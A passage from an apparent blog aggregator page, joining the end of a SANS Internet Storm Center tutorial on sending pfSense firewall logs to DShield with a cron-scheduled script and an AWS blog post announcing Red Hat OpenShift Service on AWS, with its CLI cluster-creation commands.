NTP, or some other traffic due to security policies).

Figure 3: Details to be amended in dshield.sample (to be renamed to dshield.ini)

Figure 4: User ID # and API Key Details for dshield.sample (to be renamed to dshield.ini)

You will need to ensure that the interfaces name (Line 9) matches the alias name of your WAN interface (with reference to Figure 5, and this information can be retrieved at https://<yourpfsenseipaddress>/status_interfaces.php). By default, if it was not amended when pfSense was first installed, you should not need to amend Line 9 of dshield.sample.

Figure 5: WAN Name for Line 9 in dshield.sample (to be renamed to dshield.ini)

Finally, remember to rename dshield.sample to dshield.ini (do not forget this, or else dshield.php will not work).

4) Upload dshield.php and dshield.ini to your pfSense firewall

Finally, we can now upload dshield.php and dshield.ini into your pfSense firewall. We will use the pfSense WebGUI Command Prompt page to upload the 2 files. Under the “Upload File” section, browse to where dshield.php and dshield.ini was saved on your computer and select “Upload” (please refer to Figures 6 and 7).

Figure 6: dshield.php Uploaded to pfSense Firewall

Figure 7: dshield.ini Uploaded to pfSense Firewall

They will first end up in the /tmp directory. Type in the following commands (without quotes) “mv /tmp/dshield.ini /root/bin/“ and “mv /tmp/dshield.php /root/bin/” under the “Execute Shell Command” section of the pfSense WebGUI Command Prompt page to move them into the /root/bin/ directory (Figure 8 and 9 shows the commands being executed successfully).

Figure 8: Execution of command (without quotes) “mv /tmp/dshield.ini /root/bin/

Figure 9: Execution of command (without quotes) “mv /tmp/dshield.php /root/bin/

5) Make dshield.php executable, and add a Cron Job

We also have to make dshield.php executable. With reference to Figure 10, the command (without quotes) “chmod +x /root/bin/dshield.php” is executed.

Figure 10: Making dshield.php Executable

Finally, to ensure that firewall logs are regularly sent to DShield, a cron job for dshield.php has to be scheduled. There are a few ways to schedule such a job. For example, you could SSH into your pfSense firewall and run the command (without quotes) “crontab -e”, and add the line (without quotes) “11,41 * * * * /root/bin/dshield.php” (this means at 11th and 41st minute of the hour, dshield.php is executed). However, if we are strictly using the pfSense WebGUI Command Prompt, “crontab -e” would not work as the WebGUI Command Prompt does not support interactive sessions. As such, we will install the “Cron” package that is located under “System > Package Manager > Available Packages”. If you had previously installed the Cron package, this step can be skipped.

Figure 11: Installing pfSense Cron Package

After Cron is installed, it can be found under “Services > Cron” (please refer to Figure 12 for an illustration).

Figure 12: Location of pfSense Cron Menu Item

Select “Add”, and fill in the corresponding details (Please refer to Figure 13 for a screenshot of the configuration):

Day of the Month*
Month of the Year*
Day of the Week*

Figure 13: Configuration of dshield.php Cron Job

6) Configuration complete, and test dshield.php

After all the configuration has been completed, run the command (without quotes) “/root/bin/dshield.php” in the pfSense WebGUI Command Prompt. With reference to Figure 14, it shows a successful execution of dshield.php.

Figure 14: Successful execution of dshield.php

After a few minutes (it may take a while at times), you will receive an acknowledgement from admin<at>dshield[.]org and a short summary of what was submitted to DShield. Alternatively, if you did not opt in to receive an acknowledgement e-mail after submitting your firewall logs, you can also navigate to the “My Reports” tab in your Internet Storm Center account to see the logs that you have submitted (in the last 30 days). The command (input the command without quotes) “cat /tmp/lastdshieldlog” can also be executed in the pfSense WebGUI Command Prompt to check the contents of firewall logs last submitted to the SANS Internet Storm Center.

With that, your pfSense firewall has been configured to regularly submit firewall logs to DShield. Registered users also can optionally enable Fightback in their account, and log reports will be forwarded to the Internet Service Provider (ISP) where the attack originated from after analysis [8]. All DShield data is consolidated over here [9], and will benefit users globally in protecting their networks from intrusion attempts.


Yee Ching Tok, ISC Handler
Personal Site

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Red Hat OpenShift Service on AWS Now GA

This post was originally published on this site

Our customers come to AWS with many different experiences and skill sets, and we are continually thinking about how we can make them feel at home on AWS. In this spirit, we are proud to launch Red Hat OpenShift Service on AWS (ROSA), which allows customers familiar with Red Hat OpenShift tooling and APIs to extend easily from their datacenter into AWS.

ROSA provides a fully managed OpenShift service with joint support from AWS and Red Hat. It has an AWS integrated experience for cluster creation, a consumption-based billing model, and a single invoice for AWS deployments.

We have built this service in partnership with Red Hat to ensure you have a fast and straightforward way to move some or all of your existing deployments over to AWS, confident in the knowledge that you can turn to both Red Hat and AWS for support.

If you’re already familiar with Red Hat OpenShift, you can accelerate your application development process by leveraging standard APIs and existing Red Hat OpenShift tools for your AWS deployments. You’ll also be able to take advantage of the wide range of AWS compute, database, analytics, machine learning, networking, mobile, and other services to improve customer agility, rate of innovation, and scalability.

To demonstrate how ROSA works, let me show you how I create a new cluster.

Building a Cluster With ROSA
First, I need to enable ROSA in my account. To do this, I head over to the console and click the Enable OpenShift button.

Screenshot of Red Hat OpenShift Console

Once enabled, I then check out the Getting Started section, which provides instructions on downloading and installing the ROSA CLI.

Once the CLI is installed, I run the verify command to ensure I have the necessary permissions:

rosa verify permissions

I already have my AWS credentials set up on my machine, so now I need to log into my Red Hat account. To do that, I issue the login command and follow the instructions on setting up a token.

rosa login

To confirm that I am logged into the correct account and all set up, I run the whoami command:

rosa whoami

This lists all my AWS and Red Hat account details and confirms what AWS Region I am currently in.

AWS Account ID:               4242424242
AWS Default Region:           us-east-2
AWS ARN:                      arn:aws:iam::4242424242:user/thebeebs
OCM API:            
OCM Account ID:               42hhgttgFTW
OCM Account Name:             Martin Beeby
OCM Account Username:
OCM Account Email:  
OCM Organization ID:          42hhgttgFTW
OCM Organization Name:        AWS News Blog
OCM Organization External ID: 424242

To prepare my account for cluster deployment, I need a CloudFormation stack to be created in my account. This takes 1-2 minutes to complete, and I kick the process off by issuing the init command.

rosa init

Now that I am set up, I can create a cluster. It takes around 40 minutes for the cluster creation to complete.

rosa create cluster --cluster-name=newsblogcluster

To check the status of my cluster, I use the describe command. During cluster
creation, the State field will transition from pending to installing and finally reach ready.

rosa describe cluster newsblogcluster

I can now list all of my clusters using the list command.

rosa list clusters

My newly created cluster is now also visible within the Red Hat OpenShift Cluster manager console. I can now configure an Identity provider in the console, create admins, and generally administer the cluster.

To learn more about how to configure an identity provider and deploy applications, check out the documentation.

Available Now
Red Hat OpenShift Service on AWS is now available in GA in the following regions: Asia Pacific (Tokyo), Asia Pacific (Seoul), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), Canada (Central), Europe (Frankfurt), Europe (Stockholm), Europe (Ireland), Europe (London), Europe (Paris), South America (São Paulo), US East (N. Virginia), US East (Ohio), US West (N. California), and US West (Oregon).

While this is a service jointly managed and supported by Red Hat and AWS, you will only receive a bill from AWS. Each AWS service supporting your cluster components and application requirements will be a separate billing line item just like it is currently, but now with the addition of your OpenShift subscription.

Our customers tell us that a consumption-based model is one of the main reasons they moved to the cloud in the first place. Consumption-based pricing allows them to experiment and fail fast, and customers have told us they want to align their Red Hat OpenShift licensing consumption with how they plan to operate in AWS. As a result, we provide both an hourly, pay-as-you-go model and annual commitments; check out the pricing page for more information.

To get started, create a cluster from the Managed Red Hat OpenShift service on the AWS Console. To learn more, visit the product page. Happy containerizing.

— Martin